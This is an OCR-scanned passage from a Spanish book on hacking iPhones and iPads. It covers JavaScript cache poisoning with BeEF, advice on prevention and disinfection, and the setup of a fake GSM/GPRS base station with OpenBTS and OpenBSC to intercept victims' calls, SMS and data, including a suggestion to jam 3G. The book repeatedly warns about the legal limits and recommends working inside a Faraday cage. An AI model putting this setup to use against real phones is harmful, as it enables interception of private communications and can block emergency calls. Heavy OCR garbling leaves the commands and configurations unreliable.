tipo de notificación. Con lo cual, aprovechando csta vulnerabilidad el ataque de infección JavaScript 
sigue siendo igual de efectivo. Dado que la característica de Smart App Banners se bhasa en una 
simple etiqueta HTMT., con el mismo entorno con el que se ha hecho la infección. JavaScript se puede 
hacer la inyección HTML para incluir dicha ctiqueta, y así asegurar la ejecución de JavaScript. La 
modificación del script para la inyección IITML es trivial y carece de sentido describirla. 
“apple-itunes-app” con: 
Pala, app-argumen 


“aop-id-myñppStorsID, affiliate 
> 


Este hug ha sido corregido en la versión 6.7 del sistema operativo OS. 


| 250 | Hacking de dispositivos iOS: iPhone & iPad 


Browser Exploitation Framework Project 
+ Para quien no lo conozca, BeEF (Browser Exploitation Framework Project) es una robusta 
herramienta para realizar test de intrusión mediante JavaScrip! para la cxplotación de navegadores. 
La cantidad de módulos y exploits disponibles es enorme, desde un básico alert para enviar mensajes 
a las víctimas, hasta la obtención de la posición geográfica del dispositiv eto. Este framework 
está SSI DOS datada e panel A desde a dl 
payloads a las víctimas y ver los resultados recibidos. 


Aunque originalmente BeEl está pensada para entornos con vulnerabilidades XSS, el principio es 
el mismo: inyectar código JavaScript en la web que la víctima visita ya sea por XSS v incrustando 
el código malicioso en el propio fichero js de la petición de la víctima. Una vez la víctima ha sido 
infectada, se puede monitorizar toda la información acerca del navegador de la misma, y comenzar 
a lanzar los payloads oportunos. Aunque csta herramienta no esté orientada para dispositivos 
móviles, y por ello no todos los payloads disponibles obtienen resultados satisfactorios, una buena 
combinación de ellos permite recopilar gran cantidad de información, así como realizar redirecciones 
y crear iframes en la web visitada por la víctima. Además dispone de un módulo de interoperabilidad 
con Metasploit. 


Para el entorno descrito, utilizar BeEF es tan sencillo como descargarlo de la web oficial, realizar 
la instalación siguiendo los pasos del manual incluido, y modificar el fichero ison pl que utiliza 
squid para realizar la infección de los ficheros JavaScript solicitados por la víctima. En vez de añadir 
el contenido del fichero pasare/a.js, se concatenará el fichero hoo4.js proporcionado por la propia 
herramienta, 


E DEE 
4 Ep Oine Browsers 


00 B ioziaoss 
||  @ d Miss 


Tagen 11.24: Panel de control de BeEF. 
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5.Prevención y desinfección 


Muchos de los ataques realizados a día de hoy están basados fundamentalmente en el desconocimiento, 
la ingenuidad y la falta de interés de los propios usuarios. Es por ello que la mayor medida de 
prevención a tomar ante cualquier ataque es el sentido común y una bucna base en seguridad 
informática. 


Si se en posición de propietario (o administrador incluso) de uno o varios AP y se quiere evitar 
la suplantación se debe establecer una fuerte política de seguridad. En el caso de redes con clave 
compartida (WPA -PSK y WPA2-PSK, WEP queda descartado), es conveniente urilizar una clave 
lo suficientemente robusta, con una longitud de al menos 10 caracteres y un charser completo 
(números, letras, simbolos y caracteres especiales). En el caso de redes que implementan validación 
contra servidores Radius, utilizar siempre un certificado ya que su falsificación es compleja. Además 
es importante añadir todas las capas de seguridad posibles, como ocultación del £SSID y filtrado 
por mac. 


En el caso de ser cliente, conectarse única y exclusivamente a redes que se sepa que son de confianza 
en los que el cifrado sea suficientemente robusto. Además utilizar la misma configuración con 1P 
estática para csa red, y de ser posible, confirmar que el punto de acceso al que se está conectando 
el equipo tiene el BSSID habitual. Para casos de necesidad donde no existe una red de confianza, 
siempre se tienc la posibilidad de oplar por compartir la conexión del dispositivo 3G si existe la 
opción, y en caso contrario navegar lo justo y necesario, evitando todo lo posible iniciar sesión en 
cualquier web. 


Como se ha visto anteriormente, al ataque de JS Bornet consiste en la persistencia de los ficheros 
«JavaScript cacheados con expiración infinita, por lo que la desinfección pasa por ser tan sencilla 
como realizar una limpieza de la caché. Una buena práctica cuando no se está conectado a una red 
de confianza consiste en la utilización de la navegación “temporal” de muchos de los navegadores 
actuales (cl llamado modo seguro, /nPrivate o incógnito), ya que en tal caso aunque el equipo quede 
infectado con JavaScript malicioso, este desapurecerá al cerrar cl navegador, quedando el equipo 
intacto. 


Para cl caso concreto de iPhone, existe la opción de deshabilitar la ejecución de JavaScript en Safari 
desde la sección Safari situada en los Ajustes del dispositivo, con lo que cn tal ceso no llegaría a 
ejecutarse el código malicioso, (el inconveniente es que algunas webs con toda seguridad perderían 
una gran parte de su fimcionalidad), o de utilizar el Modo Privado, por lo que no se almacenarian los 
ficheros infectados en caché, tal y como se ha mencionado anteriormente. Pero si de verdad lo que 
se quiere realizar es una limpieza de la caché. basta con acceder a Ajustes, Safari, Borrar cookies y 
datos. 


La siguiente imagen muestra este último caso, con un lógico y claro mensaje de advertencia de las 
consecuencias de realizar esta acción. 
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Cancelar 


Imagen 11.25: Borrado de datos de caché cn 
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Capítulo XII 
Ataques GSM-GPRS a iPhone 


1. Introducción 


Las comunicaciones móviles (2G/3G) son desde hace años. y cada vez más, uno de los principales 
canales por los que viaja información muy critica de la mayoría de las organizaciones. Sin embargo, 
cuando se realizan pruebas de intrusión, las comunicaciones 2G/3G suelen quedar fuera del alcance 
de dichas pruebas, como si se consideraran seguras, lo cual es un error. 


En el pasado era difícil analizar la seguridad de las comunicaciones 2G/3G de una organización, por 
la ausencia de herramientas para ello con un coste razonable. Pero esto ya no es excusa: la aparición 
en los últimos años de dispositivos hardware de relativamente bajo costo y de herramientas software 
de libre distribución, ha puesto los medios necesarios al alcance de cualquiera. 


En este capítulo se describe una serie de herramientas disponibles y cómo éstas se pueden emplear 
para realizar ataques sobre distintos aspectos de las comunicaciones móviles de un dispositivo como 
el iPhone. Con ello se pretende que el lector sea capaz de realizar dichos ataques. 


No obstante, debe tenerse cn cuenta que, por supuesto, los habimales avisos de exención de 
responsabilidad aplican también en este caso: antes de realizar cualquiera de los ataques descritos 
aquí, el lector debe asegurarse de conocer cualquier riesgo legal en el que pudiera incurrir, 
consultando a cuantas fuentes considere oportunas. Esta precaución, que es necesaria de cara a 
realizar cualquier actividad de una prueba de intrusión, en el caso de las comunicaciones móviles 
es aún más importante si cabe, ya que el simple hecho de emitir señales GSM en las bandas de 
frecuencia asis das para ello, sin disponer de una lis sencia, constituye en sí mismo una violación 
de las leyes, a diferencia de lo que sucede con otras comunicaciones, como Wi-Fi o Bluetooth, que 
utilizan bandas de frecuencia de libre uso. 


Para evitar ese problema legal, se sugiere realizar todas las prucbas dentro de una jaula de Faraday, 
como se describe más adelante. De este modo la señal emitida quedará confinada dentro de la jaula, 
y se garantizará que solo se podrán ver afectados por las pruebas aquellos dispositivos móviles 
que hayan sido introducidos en clla. No obstante, incluso si se utiliza una jaula de Faraday, se 
recomienda obtener asesoramiento legal antes de realizar cualquier prueba. 


1 hnp/esavikipedia. orpácikillaula de Faraday 
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Entre los múltiples ataques conocidos contra comunicaciones 2G/3G, este capítulo se centra en 
aquellos que se pueden llevar a cabo utilizando una estación base falsa 2G, porque con una misma 
infraestructura se pueden realizar una gran variedad de ataques, obteniendo control total sobre las 
comunicaciones de los dispositivos victima, tanto de voz como de mensajes cortos (SMS) o de datos 
ar. 


Los ataques que se van a describir afectan solo a comunicaciones 2G, ya que aprovechan la falla 
de autenticación bidireccional de GSM/GPRS, y en principio no afectarían a 3G. Pero en realidad 
también se pueden efectuar contra dispositivos que son 3G, porque la mayoría de estos dispositivos 
admiten el servicio 2G cuando no pueden obtener servicio 3G, y un atacante no tendría más que 
utilizar un inhibidor de frecuencias (jammer) de la banda de 3G para hacer imposible al dispositivo 
victima obtener servicio 3G. 


2. Herramientas necesarias 


Infraestructura basada en OpenBTS 


Descripción general de componentes 

La infraestructura basada en el software de código abierto OpenBTS? puede utilizarse para emular. 
las capacidades de un atacante que pretenda interceptar y manipular comunicaciones GSM de 
dispositivos móviles. Este lipo de infraestructura presenta un interfaz radio Um (2G) a cualquier 
dispositivo móvil, emulando también parte de la funcionalidad de una red GSM. Asimismo, actúa 
como pasarela para las comunicaciones entre ese interfaz y una red IP con señalización Sip. 


En cl momento de escritura de este capítulo, OpenBTS tiene 2 versiones utilizables: OpenBTS 
2.6 (rama de desarrollo completamente cerrada y terminada) y OpenBTS 2.8 (rama de desarrollo 
abierta). La versión de uso recomendada es la 2.8 por varios motivos*: 

- Los propios desarrolladores de OpenBTS lo recomiendan 

- Ya no hay desarrollo oficial sobre OpenBTS 2.6 


- El soporte al driver UHD está descontinuado en OpenBTS 2.6 (y por tanto el soporte a 
todos los disposilivos radio que no sean USRP1) y se ha trasladado a OpenB78 2.8 


2 tip: Lwush netitractrampepublic. 
3 En este capítulo haremos referencia a las 2 versiones de Open813 por completiwd en la exposición. 
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Un profesional de la informática que desee realizar pruebas de ataque sobre comunicaciones 
móviles, emulando una red GSM mediante una infraestructura basada en OpenBTS debe disponer 
de un laboratorio con los siguientes componentes: 


NEWS 


- Un dispositivo de comunicaciones de radio capaz de emitir en las frecuencias de GSM 
(850 MHz, 900 MHZ y 1800 MHZ). Fste dispositivo será cualquiera de los modelos 
soportados de USRP". modificado en aquellos casos donde sea necesario con un reloj lo 
suficientemente preciso”. - 


- Un ordenador con sistema operativo Linux (recomendado Ubuntu) donde instalar todos 
los elementos software. 


- Cables, conectores, antenas, 
- Una jaula de Faraday 
. SW: 
- Un driver para gestionar el dispositivo radio, que según la versión puede ser libusrp de 
GNURadio o bien UHD. 
- El software OpenBTS, que incluye un modem radio y otros elementos. 
- Una PBX software (típicamente Asterisk o Jreeswitch) f 


+ Conectividad: conectividad IP con internet para poder enrutar llamadas salicntes desde 
ÜpenBTS a cualquier número a través de un proveedor de servicios VoTP y también entrantes a ese 
proveedor (que luego podrían ser enrutadas a los terminales internos mediante configuraciones 
específicas en la PBX). 


Estas componentes se combinan para proporcionar las siguientes funciones: 
* Emisión / recepción de radio: realizada por el dispositivo radio elegido. 


* Modulación de la señal: El software de OpenBTS implementa un módem software 
denominado Transceiver, que corre como un proceso independiente y arrancado por el software 
de OpenBTS. 


» Niveles 1,2 y 3 del protocolo: El sofware de QpenBTS hace uso del transceiver para acceder 
al dispositivo de radio e implementa un subconjunto fundamental de los protocolos de nivel 1, 
2 y 3 de GSM. i 


+ Enrutamiento de llamadas: Las funciones de enrutamiento de llamadas (que en una red 
GSM son proporcionadas por cl MSC) son realizadas por una PBX soflware (típicamente 
Asterisk, aunque los detalles serán proporcionados más adelanto). 


+ Gestión de usuarios: Las funciones de gestión de usuarios de la red, que son realizadas por 
el VLR y HLR en una red GSM, son proporcionadas también por la infraestructura: 


:¿/gnuradio.org/redminelprojects/gmiradio wiki OpenBTSUID 


S Imp: d/gmuradio.org/recmine/projects/gnaradiobviki/Opent81SVHDECIOCks 


| 256 | Hacking de dispositivos iOS: iPhone & iPad 


- OpenBTS 2.6: estas funciones las realiza la PBX 


-  OpenBTS 2.8: estas funciones las realiza una base de datos SQ7ite3 cn conjunción con 
la PBX 


e Autenticación de usuarios: La autenticación de usuarios es realizada: 


-  OpenBTS 2.6: directamente mediante consultas a la PBX 
-  OpenBTS 2.8: mediante un módulo específico para realizar esta función (sípauthserve) 
que corre como proceso independiente en cl mismo u otro servidor que OpenB TS 
= Soporte a SMS: el servidor srore-and-forward para soporte a SMS se denomina sinqueue y 
es suministrado junto con el software OpenBTS como elemento opcional. 


« Aislamiento del entorno de pruebas: debido a que el uso de frecuencias de radio está 
fuertemente regulado en la mayoría de los países, así como la suplantación de operadores y 
la captura de comunicaciones. todas las pruebas de intrusión deben realizarse en un entorno 
cerrado y protegido. Esto puede conseguirse con una jaula de Faraday profesional que cuente 
con conectores apantallados al exterior‘ 7 


El siguiente diagrama refleja un setup con los componentes HW y SW más comunes" para una 
infraestructura basada en OpenBTS246 y las relaciones entre ellos: 


Tmugen 12.01: Componentes típicos de una infraestructura basada en OpenB1S 2.6.. 


En las versiones de OpenBT5 2.8 y posteriores el diagrama de componentes varia notablemente 
puesto que existen componentes distintos y otros son adicionales. Aunque puede usarse una 
configuración multi-BTS, para los propósitos de una prueba de intrusión la configuración con BTS 
única es suficiente y es la que se muestra en la figura siguiente: 


6 Aunque la pes de intrusión esté autorizada por un cliente; este con toda probabilidad no tiene competencia pura 
autorizar el E ctro radioeléctrico ni la suplantación de operadores de telecomunicaciones. Queremos remarcar 


que cualquier actividad de prueba de intrusión sobre comunicaciones viles realizada fuera de la jaula de Faraday, 
es segu is as, puesto que podríamos privar a determinado 
ni comunicaciones d garantizadas por la ley. Por csto debemos insistir en T 


7 Obviamente este elemento noes necesario para un atacante real. 
8 En apartados posteriores de este capítulo se detallan todos los posibles componentes que pueden realizar cada 
funcionalidad. 
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Imagen Componentes típicos de una infraestructura basuda en OpenBTS 2. 


Notas de instalación y configuración 

En este apartado se recogen las notas de configuración pertinentes para cada componente atendiendo 
a su uso especifico para realizar pruebas de concepto. La instalación y configuración básicas del 
software, así como instrucciones para su uso están recogidas en las referencias que se aportan. 


Dispositivos de radio y drivers asociados 5 
Los dispositivos de radio utilizados por OpenBTS son todos de la familia de las USRP” (Universal: 
Sofiware Radio Peripheral), Los soportados por Openg TS son los siguientes!': 


» USRPI: requiere la instalación del driver libusrp de GNURadio, en lugar del driver UND 
que gestiona el resto de dispositivos. La última versión de GNURadio que incluía este driver" 
es la 3.4.2. Este driver ya no tiene soporte por parte de GNURadio. Las instrucciones para la 
instalación de GNURadio pueden encontrarse en la siguiente dirección: hp: //GNURadio.org/ 
redmine/projects/GNURadio/wiki/nstallingGR 


» USRP2/N210/N200 y B100/K100/E110: OpenBTS hace uso del driver UHD para 
comunicarse con todos estos dispositivos. Es recomendable hacer uso de la versión 2.8 de 
OpenBTS puesto que, como se ha comentado, el soporte a este driver en OpenBTS estaba ubicada 
en algunas ramas no principales de desarrollo, y está discontinuado en la versión 2,6 en favor de 
la versión de 2.8. La instalación del driver UHD está documentada en las referencias aportadas. 


Nota: Para que OpenBTS funcione correctamente con todos estos dispositivos es 
muy importante la precisión del reloj. La estación base debe poseer un reloj cuanto 
más preciso mejor, que luego deberá ajustarse para el adecuar el muestreo a un múl- 
tiplo de 13 MHz. Más información a este respecto puede encontrarse en htrp://wush. 
netitrac/irangepublic/wiki/Clocks 


Y hirp:Hlenavikipedia, orgAvikiUniversal_Sofware_Radio_Peripheral 
10 hitp.¿/gmuraadio.orz/redmine/projects/gmuradiohwiki/OpenBTSUED 


11 hrip://emuradio.org/releases/gmuradio? 


12 hútp://code.elius.combredomnetertus/projects/uhdAwiki 
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PBX 
Asterisk 


LS Nota: Se presupone al lector conocimientos básicos de funcionamiento y configura- 


ción de Asterisk. Estos conocimientos pueden ser encontrados en los recursos recogi- 
dos en http://www. Asterisk org/get-started. 


OpenBTS 2.6 funciona con Asterisk en configuración estándar (es lo que OpenB15 denomina “basic- 
installation”) como PBX. OpenBTS 2.8 está pensada para funcionar con Asterisk “real-time”, aunque 
también puede funcionar con Asterisk “basic installation” como PBX. En este último caso, para que 
funcione la integración de la autenticación de OpenBTS con Asterisk y el enrutamiento dinámico de 
llamadas deben realizarse varias tareas de configuración manual sobre Asterisk por cada registro, lo 
cual hace inviable su uso en un entorno real, por lo que esta configuración no se recomienda, 


En el caso de utilizar Asterisk “basic-installation” (tipicamente con OpemBTS 2.6), la instalación 
del software puede realizarse tanto como paquete como compilando el código fuente. l'oda la 
documentación relacionada Asterisk puede encontrarse ias lerisk.org/gebstarted 
y en: htip:/Avww.voip-info.orgáwikitview/Asterisk | Step-by-step | Installation. 


La configuración de Asterisk para su funcionamiento con OpeniB75 está-ecogida en la siguiente 
dirección: hp: /GNURadio.ore/redmine/projects/GNURadio/wiki/OpenBTSSettingUpAsterisk. 


Asterisk Real Time 
A partir de la versión 2.8 OpenBTS puede utilizar la arquitectura Real Time” de Asterisk con SOLite3, 
En concreto, es un requisito para las instalaciones multi-BTS (no necesarias para las pruebas de 
concepto). 


Las instrucciones de instalación y configuración del sistema para su funcionamiento con OpenB IS 
pueden encontrarse en: hitp:/hwush.nelliractrangepublic/wikiésqlie3ODBC, 4 


Treeswitch 


Solo como referencia, también podría utilizarse freeswitch para su funcionamiento con OpenBTS 
2.6 (rama UCB), según las instrucciones recogidas en esta dirección: h11p-/GNURadio.org/redmine! 
projectsíGNURadio/wikWOpenBTSSettingUpFreeSWITCH 


OpenBTS 

Lxisten varios documentos que describen cl proceso de instalación de OpenBTS y de todas sus 
dependencias en función del HW y SW utilizado. El documento de la wiki oficial es el más completo 
al respecto es: htp:/Awush.nertractrangepublichwiki/BuildInstaliRun 


13 Afip:/wwwvoip-info.org/wiki/view/Asterisk+ RealTime 
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Nota: para configuraciones basadas en UpenBTS 2.8, se recomienda crear el fiche- 
L ro /ete/rsyslog.d/OpenBTS.conf con el siguiente contenido para separar los logs de 


OpenBTS a un fichero independiente: 
local7.* »arllog/OpenBT8 log 


La configuración de Openi37'5 consiste en una serie de parámetros que determinan, por un lado, el 
correcto funcionamiento de todos los elementos del sistema y por otro, la configuración adecuada de 
la celda falsa para que funcione cl ataque de estación basc falsa. Para el primer objetivo, la referencia 
y notas anteriores aportan la documentación necesaria, mientras que para el segundo se comentarán 
los aspectos particulares más adelante en este capitulo. 


Infraestructura basada en OpenBSC 


Descripción general de componentes 


Si además de interceptar y manipular las comunicaciones GSM de dispositivos móviles, se desea 
también poder interceptar y manipular comunicaciones de datos GPRS/Edge, entonces en lugar de 
la infraestructura basada en OpenBTS, des crita en el apartado anterior, se puede utilizar la quese 
describe a continuación, basada en Open85C. 


Elementos hardware 

Los elementos hardware necesarios son: 
- Una estación base GSM que soporte GPRS/Edge, y que esté soportada por OpenBSC", 
como por ejemplo las estaciones base namoBTS de lP4ccess (concretamente el modelo 
165CU para banda de 900 MHz, o el modelo 165G para la banda de 1800 MHz). 
- Un PC con sistema operativo GNU/Linux donde instalar todos los elementos sofware 
relacionados con OpenBSC. No es necesario que sea especialmente potente: un pequeño 
netpc sirve perfectamente. Puede incluso usarse una máquina virtual, instalada en algún 
equipo físico que tenga las conexiones necesarias. 
-Opcionalmente (recomendado): un segundo PC, también con sistema operativo GNU/ 
Linux, en el que instalar todos los elementos de software relacionados con la manipulación 
de tráfico IP y ataque a través del mismo. Puede utilizarse una scgunda máquina virtual, 
instalada en el mismo equipo físico que el anterior. 
- Cables, conectores, antenas. Más adelante se describen con más detalles las conexiones 
necesarias. 


- Una jaula de Faraday 
14 Además de las nanoBTS de ZPAccess, OpenBSC soporta también la BTS BS-11 de Siemens y la DTS sysmoDTS de 
sysmocom (hip:/Avvaw.sysmocom.com/), compañía fundada por los creadores de OpenBSC. 
15 Aunque la prueba de intrusión esté autorizada porun cliente, este con toda probabilidad no tiene competencia para 


autorizar cl uso del espectro radiocléctrico ni la suplantación de operadores de telecomunicaciones. Queremos remarcar 
que cualquier actividad de prueba de intrusión sobre comunicaciones móviles realizado fuera de la jaula de Faraday, es 
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Nota: Las estaciones base manoBTS incluyen unas pequeñas antenas, que son sufi- 
cientes para dar cobertura a su alrededor. No obstante, si se desea utilizar antenas 


directivas, por ejemplo, es posible reemplazar las pequeñas antenas integradas por 
Otras. conectándolas mediante cables con conectores de tipo SMA. 


Elementos software / 
Los elementos software necesarios son: f 
- OpenBSC. i 
- OsmoSGSN (aplicación osmo-sgsn, incluida en OpenBSC). A 
- OpenGGSN. à X 


- Sistema operativo GNU/Linux. — 

- LCR (Linux Call Router), si se desea poder manipular las comunicaciones de voz y SMS. 
- Asterisk, si se desea poder manipular las comunicaciones de voz y SMS. 

- Software de manipulación de tráfico IP o de ataque a través de TP, como por ejemplo, 
1Ptables, Wireshark, Metasploit, dnsmasq, etcétera. Opcionalmente (de hecho es la opción 
que se recomienda!”) esto sofware puede instalarse en un equipo adicional ubicado entre el 
equipo de OpenBSC e Internet, 


Conectividad con Internet 

Además de los elementos hardware y software descritos, será necesario contar con conectividad 
IP hacia Internet, desde el laboratorio, cuando este se esté utilizando. Conerctamente, debe poder 
llegarse a Internet desde el equipo GNU/Limae. 


Esta conexión a Internet es necesaria para enrutar a través de ella todo el tráfico 1P de las conexiones 
de datos de los dispositivos móviles víctima, y también para enrutar a través de ella, utilizando VoIP, 
las llamadas externas pe voz que se quiera cursar, igual que se describió en el caso del laboratorio 
basado en OpenBTS. 


La tecnología empleada para obtener esa conectividad puede ser de cualquier tipo: Wi-Fi, 3G a 
través de modem USB, conexión ethernet con salida por ADST. o cable, ele. 


Arquitectura 
En el siguiente diagrama se muestra un posible montaje de un laboratorio con los componentes 11W 
y SW de una infraestructura basada en OpenBSC, y a continuación se describe dicho montaje. 


ilsgal e incluso peligrosa para la seguridad de las persones, puesto que podríamos privar a determinado terminal de las 
comunicaciones de emergencia garantizadas por la ley. Por estu debemos insistir en que es extremadamente importante 
realizar cualquiera de las pruebas descritas en este capítulo dentro de una jaula de Faraday. 


16 Separar el software de manipulación de tráfico IP en un segundo cquipo, permite que dicho equipo pueda ser reutilizado, 
cuando sea necesano, para manipulación de tráfico proveniente de otras conexiones, como pueden ser puntos de acceso 
Hi-Fi falsos, por ejemplo 
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Ezuipo Opens Equipo de raripulazión de 
kikoi 


Imagen 12.03: Componentes de una infraestructura hasada en OpenBSC. 


Comenzando por la parte izquierda de la figura, el dispositivo victima deberá ser introducido en 
la jaula de Faraday. En el interior de la misma, se habrån conectado dos antenas (por ejemplo 
las propias antenas que vienen con la nanoBTS) en sendos conectores SMA de dentro, y cn los 
correspondientes conectores del exterior de la caja (también SMA) deberán conectarse sendos 
cables de 50 ohmios, que irán conectados en su otro extremo a los conectores (también SMA) de 
transmisión (TX) y recepción (RX) de la nanoBTS (esquinas inferiores izquierda y derecha). 


La estación base nanoBTS se alimenta a través del mismo puerto ethernet por el que se comunicará 
con el PC. Para aportar esa alimentación la nanoBTS viene con un transformador que por un lado 
se conecta a la corriente eléctrica (220V AC). y por el otro tiene dos puertos RJ45: uno etiquetado 
como “BTS”, que debe conectarse al puerto RJ45 de la nanoB TS mediante un cable ethernet directo, 
y otro puerto RJAS etiquetado como “LAN”, que deberá conectarse al equipo OpenBSC mediante un 
cable ethernet cruzado (o mediante cables directos, utilizando un hub o switch entre ambos equipos). 


En el equipo OpenBSC deben estar instalados OpenESC, OpenGGSN y OsmoSGSN, y todas sus 
dependencias, que ya han sido comentadas anteriormente, La tarjeta ethernet adicional del equipo 
Open BSC deberá estar conectada al equipo de manipulación de tráfico, mediante cthernet, utilizando 
un cable cruzado (o cables directos, utilizando un hub o switch entre ambos equipos). 


En el equipo de manipulación se habrá instalado el software de captura y manipulación de tráfico 
deseado, como por ejemplo JPrables, dnsmasg, Metasploit, Wireshark, y otros. 


El equipo de manipulación deberá disponer además de una conexión a Internet mediante un camino 
que no pase por el equipo OpenBSC. Por ejemplo, podría tener una tarjeta ethernet adicional y tener 
esta conectada a un router ADSL, o disponer de un modem USB 3G con conexión de datos a Internet 
mediante 3G. 


Adicionalmente, y de manera opcional, si además de los datos se fuera a manipular las comunicaciones 
de voz y SMS sería necesario contar con un servicio de VolP a través de Internet, proporcionado 
por algún proveedor. Esta parte, no obstante, queda fuera del alcance de este libro y por tanto no se 
describirá con más detalle. 
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Notas de instalación y configuración | 

En este apartado se recogen las notas de instalación y confikuración pertinentes para cada componente 
atendiendo a su uso específico para realizar pruebas de concepto. La instalación y configuración 
básicas del software, así como instrucciones para su uso están recogidas en las referencias que se 
aportan. A 


Instalación de prerrequisitos software: libasmacore y libosmo-abis 
OpenBSC depende de dos librerias, libosmocore y libosmo-abis, que deben ser instaladas 
previamente. En las siguientes direcciones pueden encontrarse las instrucciones para descargar, 
compilar e instalar estas librerías: 

-  htip:/bb.osmocom.org/trac/wiki/libosmocore 

- http: /OpenBSC.osmocom.org/trac/hlog/libosmo-abis 


Instalación de OpenGGSN 

OpenGGN es una implementación de un GGSN (Gateway GPRS Support Node). Lis necesario 
para el enrutamiento de tráfico GPRS, y además incluye la librería libg/p, que es necesaria para que 
después, cuando se compile OpenBSC, se incluya en la compilación el componente osmo-sgsn, que 
es la implementación de un SGSN incluida en OpenBSC. 


En la siguiente dirección se puede encontrar más información sobre OpenGG8N, incluyendo enlaces 
para su descarga: hp: /OpenBSC.osmocom.org/trachviki/OpenGGSN 


El proceso de compilación cs cl habitual: autoreconf -fis ./ 


'onfigure; make; make install. 


Instalación de OpenBSC 
En la siguiente dirección se puede obtener información sobre OpenBSC, incluyendo las instrucciones 
de descarga del código fuente: http: //OpenBSC.osmocom.org/trachwiki/OpenBSC 


El proceso de compilación es el habitual: auroreconf -fi, 


/configure; make; make install. 


Nota: Para permitir que el SGSN acepte dar servicio a cualquier IMSI, y no solo a 
los que tengan los mismos MCC y MNC que la celda que se emita, puede ser nece- 


sario revertir el siguiente commit antes de compilar OpenBSC: eafe22ca7290280fca- 


0f8d31d70239fdU0bUdbbYd 


Instalación de uml-utilities 

El paquete uml-utilites proporciona la posibilidad de crear interfaces de red de loopback adicionales: 
(aparte del interfaz “lo”). Dichos interfaces se ercan con el comando “tunctl” y reciben nombres con 
formato “tapN” donde “N” es un número natural. 
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i 
Se recomienda zE par de estos interfaces de loopback adicionales, uno para que escuche en él el 


servicio GGSN (OpenGGSN). y otro para que escuche en él el servicio DN: ISsMasq). 


\ 
La instalación del pàquete uml-utilities se puede realizar ejecutando: 


1L uml-ati: 


sude aptitude irs 


La creación y configuración de los interfaces de red adicionales de loopback (direcciones TP, cte.), se 
puede realizar en el fichero /te/network/interfaces, con un contenido similar a este: 

f interlaces(5) file used by ifup(£) and ifdown (9) 

auto lo 

ifece lo inet lcopback 


4 ath0 - Internel 
auto 0 
iface etkU inet dhc 


- DHCP 

inet static 

address 10.10.19.5 
netmask 255.255.255.0 


network 10.10.10.0 
broačcast 10.10.10.255 


+ ethi:1 - BSC 


auzc ethl:1 
itace ethl:1 inst static 
adore 0 


netmasx 5 
notwork  10.10.10.0 
br t 10.10.10.255 


t ióLal:2 - SGSN 
auto athl: 


iface eth1 ste 
address «10.11 
aernaak 255.0 


nework  10.10.19.0 
broadcast 10.10.10.255 


+ tapo -4 

auto tap) 

ace tapt inet static 
10.11.11.1 


+ taal -= DNS 
auto tapl 
ileve zapl inet static 
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address 10.12 
netmask 255.2 


network 1 
broadcast 10. 55 
pre=up  /usr/sbin/tunctl -t tapi 


+ NOTE; network 10.13.13.0/24 reserved for CGSN clients 
Instalación de un servidor DNS (ej.: dnsmasq) 

Dnsmasq es un servidor DNS (y DHCP y TFTP) sencillo que puede resolver localmente | cla 
que encuentre en /etc/hasts, y todas las demás p peticiones de resolución de nombres las enviat 
servidor DNS externo. ds 


Se recomienda su uso en este caso, para que los clientes GPRS siempre le pregunten a él las 
traducciones DNS, es decir, para que sea su servidor DNS, y así independizar la configuración de 
los equipos clientes GPRS, que les será proporcionada por cl GGSN, de la configuración de red del 
acceso a Internet que se esté usando cn cada momento. Su instalación se realiza como paquete: 


sudo aptitude install dnsmasq dnsmasg-utíls + 


Se recomienda configurarlo para que solo escuche en un interfaz de loopback (ej.: tap1) y no ofrezca 
servicio DHCP ni TFTP. Para ello, se puede editar el fichero fercldnsmasg.conf y descomentar las 
siguientes líncas: — 

interface=tapl 

no-dhcp-interface=tapl 

bind=imtersaces 

Instalación de un servidor DHCP (ej.: dhep3-server) 

Las BTS nanoBTS se configurarán en un n paso posterior para que obtengan su dirección IP por 
DHCP. Es necesario pues. que en la red que une al equipo labgsm00 con l nanoBTS exista un 
servidor DHCP que asigna direcciones a las nanoBTS. En este paso se instala un D a 
el propio equipo labgsm00 A E, peticiones el el interfaz cth 
(tarjeta de red adicional) y que asigne dinámicamente direcciones en un cierto rango, por ejemplo 
10.10.10.80 a 10.10.10.89.- 


La instalación de dhcp3-server se realiza como paquete: 
aptitude install dhcp3-server” 


Se deberá edit: ficheros /etc/ lt/isc= G 
que i egis idor DHCP, y el fichero ame 


direcciones a servir. 


para elegir el interfaz de red en 
-pd.conf. p para configurar el rango de 


Instalación de Asterisk y LCR 

LCR y Asterisk serán necesarios solo si se desea cursar tráfico de voz al exterior, o manipularlo, 
con el laboratorio basado en OpenBSC, pero dado que esta sección se centra únicamente en la 
manipulación del tráfico de datos. no se incluyen aquí más detalles sobre ellos. 
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Inicialización de la estación base nanoBTS 


Antes de poder utilizar un equipo TES mera vez (recién salido de fábrica) lo 
inicializarlo. ». Este proceso de inici ste en ¡car su le fábrica para 


configurarle : al menos los siguientes 2 cocina 


Parámetro Descripción 


Cadena de caracteres alfanuméricos que identifica al equipo concreto. 
Cada nanoBTS debe tener un identificador de unidad diferente. 

Unit ID 
El valor de ẹste campo determinará en la configuración de OpenBSC qué 
| configuración se aplicará a cada nanoBTS en tiempo de ejecución. 


Dirección IP del BSC con el que debe contactar la nanoBTS. 


Primary OML link IP Una vez configurados cl Unit ID y el Primary OML link 1P, la nanoBTS 
intentará contactar con el BSC enviando paquetes TCP al puerto 3002 de 
la dirección IP configurada como Primary OML link IP. 


Para realizar esta inicialización, cl software OpenBSC incluye una herramienta, el ejecutable 
*IPAccess-config”, que permite configurar los valores de Unit 1D y Primary OML link IP de los 
equipos nanoBTS. 


Se recomienda consultar la ayuda del comando /P4Access-config ejecutándolo con la opción “help”. 


A modo de ejemplo, para configurar una nanoB75 para que tenga ID 1001 y que tenga como dirección 
del BSC 10.10.10.10, suponiendo que dicha nanoBTS ha obtenido la dirección TP 10.10.10.21 por 
DHCP, habría que ejecutar los siguientes comandos: 

ipaccess-config -u 2091/3/0 -r 10.102 
Iparcens=sontg -o 10.10.10.10 -r 10.10. 


Configuración de rouling y firewall (iptables) 

La configuración minima necesaria de /Ptables para que funcione correctamente el enrutamiento de 
paquetes entre todas las redes internas y hacia Internet consiste en habilitar el parámetro de kernel / 
pracisysetfipváfip_forward y configurar MASQUERADE para todos los paquetes salientes en el 
interfaz de red de conexión a Internet (eth0). 


Esta configuración sencilla se puede guardar en un scripr /usr/local/bin/start-fw. que se utilizará para 
arrancar el servicio de firewall, como se describirá más adelante. 


El contenido completo del script /usr/local/bin/start-fw será: 
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4!/hin/sh 
echo “” 
echo “Configuring iptables zo route GPRS/EDGE tra: 
echo "” 


| Klnsh ev 

iptables 

